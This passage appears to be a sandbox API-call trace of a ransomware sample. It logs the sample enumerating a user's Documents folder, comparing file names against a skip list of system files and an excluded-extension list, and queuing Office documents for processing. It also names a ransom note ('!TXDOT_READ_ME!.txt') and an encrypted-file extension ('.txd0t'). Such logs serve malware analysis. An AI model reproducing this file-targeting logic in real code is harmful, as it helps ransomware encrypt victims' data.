StrCmpIW (psz1="CsjFe8d.pptx", psz2="bootsect.bak") returned 1 [0074.029] StrCmpIW (psz1="CsjFe8d.pptx", psz2="iconcache.db") returned -1 [0074.029] StrCmpIW (psz1="CsjFe8d.pptx", psz2="thumbs.db") returned -1 [0074.029] StrCmpIW (psz1="CsjFe8d.pptx", psz2=" ransomware ") returned 1 [0074.029] StrCmpIW (psz1="CsjFe8d.pptx", psz2=" ransom ") returned 1 [0074.029] StrCmpIW (psz1="CsjFe8d.pptx", psz2="debug.txt") returned -1 [0074.029] StrCmpIW (psz1="CsjFe8d.pptx", psz2="boot.ini") returned 1 [0074.029] StrCmpIW (psz1="CsjFe8d.pptx", psz2="desktop.ini") returned -1 [0074.029] StrCmpIW (psz1="CsjFe8d.pptx", psz2="autorun.inf") returned 1 [0074.029] StrCmpIW (psz1="CsjFe8d.pptx", psz2="ntuser.dat") returned -1 [0074.029] StrCmpIW (psz1="CsjFe8d.pptx", psz2="ntldr") returned -1 [0074.029] StrCmpIW (psz1="CsjFe8d.pptx", psz2="ntdetect.com") returned -1 [0074.029] StrCmpIW (psz1="CsjFe8d.pptx", psz2="bootfont.bin") returned 1 [0074.029] StrCmpIW (psz1="CsjFe8d.pptx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.029] PathFindExtensionW (pszPath="CsjFe8d.pptx") returned=".pptx" [0074.029] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pptx") returned 0x0 [0074.029] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.029] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.029] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0074.041] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.041] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx" [0074.041] SetEvent (hEvent=0x410) returned 1 [0074.041] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 1 [0074.041] StrCmpW (psz1="Database1.accdb", psz2=".") returned 1 [0074.041] StrCmpW (psz1="Database1.accdb", psz2="..") returned 1 [0074.041] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.041] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.041] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Database1.accdb", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Database1.accdb") returned="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" [0074.041] PathFindExtensionW (pszPath="Database1.accdb") returned=".accdb" [0074.041] StrCmpW (psz1=".accdb", psz2=".txd0t") returned -1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2="bootsect.bak") returned 1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2="iconcache.db") returned -1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2="thumbs.db") returned -1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2=" ransomware ") returned 1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2=" ransom ") returned 1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2="debug.txt") returned -1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2="boot.ini") returned 1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2="desktop.ini") returned -1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2="autorun.inf") returned 1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2="ntuser.dat") returned -1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2="ntldr") returned -1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2="ntdetect.com") returned -1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2="bootfont.bin") returned 1 [0074.041] StrCmpIW (psz1="Database1.accdb", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.041] PathFindExtensionW (pszPath="Database1.accdb") returned=".accdb" [0074.041] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".accdb") returned 0x0 [0074.041] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.041] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.042] FileTimeToSystemTime (in: lpFileTime=0x552f454, lpSystemTime=0x552f418 | out: lpSystemTime=0x552f418) returned 1 [0074.042] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f418, lpLocalTime=0x552f428 | out: lpLocalTime=0x552f428) returned 1 [0074.042] FileTimeToSystemTime (in: lpFileTime=0x552f45c, lpSystemTime=0x552f3e0 | out: lpSystemTime=0x552f3e0) returned 1 [0074.042] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f3e0, lpLocalTime=0x552f3d0 | out: lpLocalTime=0x552f3d0) returned 1 [0074.043] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.043] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0074.043] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0074.043] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbebfca0, ftCreationTime.dwHighDateTime=0x1d5eb4c, ftLastAccessTime.dwLowDateTime=0x694d61f0, ftLastAccessTime.dwHighDateTime=0x1d5ef0d, ftLastWriteTime.dwLowDateTime=0x694d61f0, ftLastWriteTime.dwHighDateTime=0x1d5ef0d, nFileSizeHigh=0x0, nFileSizeLow=0x205b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="dMMktGSdsuA8JTH.docx", cAlternateFileName="DMMKTG~1.DOC")) returned 1 [0074.043] StrCmpW (psz1="dMMktGSdsuA8JTH.docx", psz2=".") returned 1 [0074.043] StrCmpW (psz1="dMMktGSdsuA8JTH.docx", psz2="..") returned 1 [0074.043] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.043] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.043] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="dMMktGSdsuA8JTH.docx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx") returned="C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx" [0074.043] PathFindExtensionW (pszPath="dMMktGSdsuA8JTH.docx") returned=".docx" [0074.043] StrCmpW (psz1=".docx", psz2=".txd0t") returned -1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2="bootsect.bak") returned 1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2="iconcache.db") returned -1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2="thumbs.db") returned -1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2=" ransomware ") returned 1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2=" ransom ") returned 1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2="debug.txt") returned 1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2="boot.ini") returned 1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2="desktop.ini") returned 1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2="autorun.inf") returned 1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2="ntuser.dat") returned -1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2="ntldr") returned -1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2="ntdetect.com") returned -1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2="bootfont.bin") returned 1 [0074.043] StrCmpIW (psz1="dMMktGSdsuA8JTH.docx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.043] PathFindExtensionW (pszPath="dMMktGSdsuA8JTH.docx") returned=".docx" [0074.043] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".docx") returned 0x0 [0074.043] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.043] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.043] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0074.055] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.055] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx" [0074.055] SetEvent (hEvent=0x418) returned 1 [0074.055] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe473dc0, ftCreationTime.dwHighDateTime=0x1d56dd1, ftLastAccessTime.dwLowDateTime=0xc7450bc0, ftLastAccessTime.dwHighDateTime=0x1d59b69, ftLastWriteTime.dwLowDateTime=0xc7450bc0, ftLastWriteTime.dwHighDateTime=0x1d59b69, nFileSizeHigh=0x0, nFileSizeLow=0x12eb9, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="gaAE08.xlsx", cAlternateFileName="GAAE08~1.XLS")) returned 1 [0074.055] StrCmpW (psz1="gaAE08.xlsx", psz2=".") returned 1 [0074.055] StrCmpW (psz1="gaAE08.xlsx", psz2="..") returned 1 [0074.055] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.055] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.055] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="gaAE08.xlsx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx") returned="C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx" [0074.055] PathFindExtensionW (pszPath="gaAE08.xlsx") returned=".xlsx" [0074.055] StrCmpW (psz1=".xlsx", psz2=".txd0t") returned 1 [0074.055] StrCmpIW (psz1="gaAE08.xlsx", psz2="bootsect.bak") returned 1 [0074.055] StrCmpIW (psz1="gaAE08.xlsx", psz2="iconcache.db") returned -1 [0074.055] StrCmpIW (psz1="gaAE08.xlsx", psz2="thumbs.db") returned -1 [0074.055] StrCmpIW (psz1="gaAE08.xlsx", psz2=" ransomware ") returned 1 [0074.055] StrCmpIW (psz1="gaAE08.xlsx", psz2=" ransom ") returned 1 [0074.055] StrCmpIW (psz1="gaAE08.xlsx", psz2="debug.txt") returned 1 [0074.055] StrCmpIW (psz1="gaAE08.xlsx", psz2="boot.ini") returned 1 [0074.055] StrCmpIW (psz1="gaAE08.xlsx", psz2="desktop.ini") returned 1 [0074.056] StrCmpIW (psz1="gaAE08.xlsx", psz2="autorun.inf") returned 1 [0074.056] StrCmpIW (psz1="gaAE08.xlsx", psz2="ntuser.dat") returned -1 [0074.056] StrCmpIW (psz1="gaAE08.xlsx", psz2="ntldr") returned -1 [0074.056] StrCmpIW (psz1="gaAE08.xlsx", psz2="ntdetect.com") returned -1 [0074.056] StrCmpIW (psz1="gaAE08.xlsx", psz2="bootfont.bin") returned 1 [0074.056] StrCmpIW (psz1="gaAE08.xlsx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.056] PathFindExtensionW (pszPath="gaAE08.xlsx") returned=".xlsx" [0074.056] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xlsx") returned 0x0 [0074.056] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.056] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.056] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.071] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.071] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx" [0074.071] SetEvent (hEvent=0x3fc) returned 1 [0074.072] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab1b030, ftCreationTime.dwHighDateTime=0x1d5ec9f, ftLastAccessTime.dwLowDateTime=0x5fc14230, ftLastAccessTime.dwHighDateTime=0x1d57ebc, ftLastWriteTime.dwLowDateTime=0x5fc14230, ftLastWriteTime.dwHighDateTime=0x1d57ebc, nFileSizeHigh=0x0, nFileSizeLow=0xb78c, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="lLleeaH.xlsx", cAlternateFileName="LLLEEA~1.XLS")) returned 1 [0074.072] StrCmpW (psz1="lLleeaH.xlsx", psz2=".") returned 1 [0074.072] StrCmpW (psz1="lLleeaH.xlsx", psz2="..") returned 1 [0074.072] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.072] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.072] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="lLleeaH.xlsx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx") returned="C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx" [0074.072] PathFindExtensionW (pszPath="lLleeaH.xlsx") returned=".xlsx" [0074.072] StrCmpW (psz1=".xlsx", psz2=".txd0t") returned 1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2="bootsect.bak") returned 1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2="iconcache.db") returned 1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2="thumbs.db") returned -1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2=" ransomware ") returned 1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2=" ransom ") returned 1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2="debug.txt") returned 1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2="boot.ini") returned 1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2="desktop.ini") returned 1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2="autorun.inf") returned 1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2="ntuser.dat") returned -1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2="ntldr") returned -1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2="ntdetect.com") returned -1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2="bootfont.bin") returned 1 [0074.072] StrCmpIW (psz1="lLleeaH.xlsx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.072] PathFindExtensionW (pszPath="lLleeaH.xlsx") returned=".xlsx" [0074.072] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xlsx") returned 0x0 [0074.072] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.072] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.072] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0074.072] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.072] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx" [0074.072] SetEvent (hEvent=0x408) returned 1 [0074.073] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8c878c0, ftCreationTime.dwHighDateTime=0x1d58b7c, ftLastAccessTime.dwLowDateTime=0x53d3ce0, ftLastAccessTime.dwHighDateTime=0x1d58e68, ftLastWriteTime.dwLowDateTime=0x53d3ce0, ftLastWriteTime.dwHighDateTime=0x1d58e68, nFileSizeHigh=0x0, nFileSizeLow=0x18d22, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="lzf-_9_.pptx", cAlternateFileName="LZF-_9~1.PPT")) returned 1 [0074.073] StrCmpW (psz1="lzf-_9_.pptx", psz2=".") returned 1 [0074.073] StrCmpW (psz1="lzf-_9_.pptx", psz2="..") returned 1 [0074.073] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.073] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.073] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="lzf-_9_.pptx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx") returned="C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx" [0074.073] PathFindExtensionW (pszPath="lzf-_9_.pptx") returned=".pptx" [0074.073] StrCmpW (psz1=".pptx", psz2=".txd0t") returned -1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2="bootsect.bak") returned 1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2="iconcache.db") returned 1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2="thumbs.db") returned -1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2=" ransomware ") returned 1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2=" ransom ") returned 1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2="debug.txt") returned 1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2="boot.ini") returned 1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2="desktop.ini") returned 1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2="autorun.inf") returned 1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2="ntuser.dat") returned -1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2="ntldr") returned -1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2="ntdetect.com") returned -1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2="bootfont.bin") returned 1 [0074.073] StrCmpIW (psz1="lzf-_9_.pptx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.073] PathFindExtensionW (pszPath="lzf-_9_.pptx") returned=".pptx" [0074.073] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pptx") returned 0x0 [0074.073] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.073] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.073] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0074.073] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.073] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx" [0074.073] SetEvent (hEvent=0x410) returned 1 [0074.073] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x487438f0, ftCreationTime.dwHighDateTime=0x1d5e12a, ftLastAccessTime.dwLowDateTime=0x3a657ae0, ftLastAccessTime.dwHighDateTime=0x1d5e593, ftLastWriteTime.dwLowDateTime=0x3a657ae0, ftLastWriteTime.dwHighDateTime=0x1d5e593, nFileSizeHigh=0x0, nFileSizeLow=0x6e8e, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Md5Q.odt", cAlternateFileName="")) returned 1 [0074.074] StrCmpW (psz1="Md5Q.odt", psz2=".") returned 1 [0074.074] StrCmpW (psz1="Md5Q.odt", psz2="..") returned 1 [0074.074] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.074] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.074] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Md5Q.odt", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Md5Q.odt") returned="C:\\Users\\FD1HVy\\Documents\\Md5Q.odt" [0074.074] PathFindExtensionW (pszPath="Md5Q.odt") returned=".odt" [0074.074] StrCmpW (psz1=".odt", psz2=".txd0t") returned -1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2="bootsect.bak") returned 1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2="iconcache.db") returned 1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2="thumbs.db") returned -1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2=" ransomware ") returned 1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2=" ransom ") returned 1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2="debug.txt") returned 1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2="boot.ini") returned 1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2="desktop.ini") returned 1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2="autorun.inf") returned 1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2="ntuser.dat") returned -1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2="ntldr") returned -1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2="ntdetect.com") returned -1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2="bootfont.bin") returned 1 [0074.074] StrCmpIW (psz1="Md5Q.odt", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.074] PathFindExtensionW (pszPath="Md5Q.odt") returned=".odt" [0074.074] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".odt") returned 0x0 [0074.074] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.074] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.074] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0074.099] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.099] StrNCatW (in: psz1="\\\\?\\", 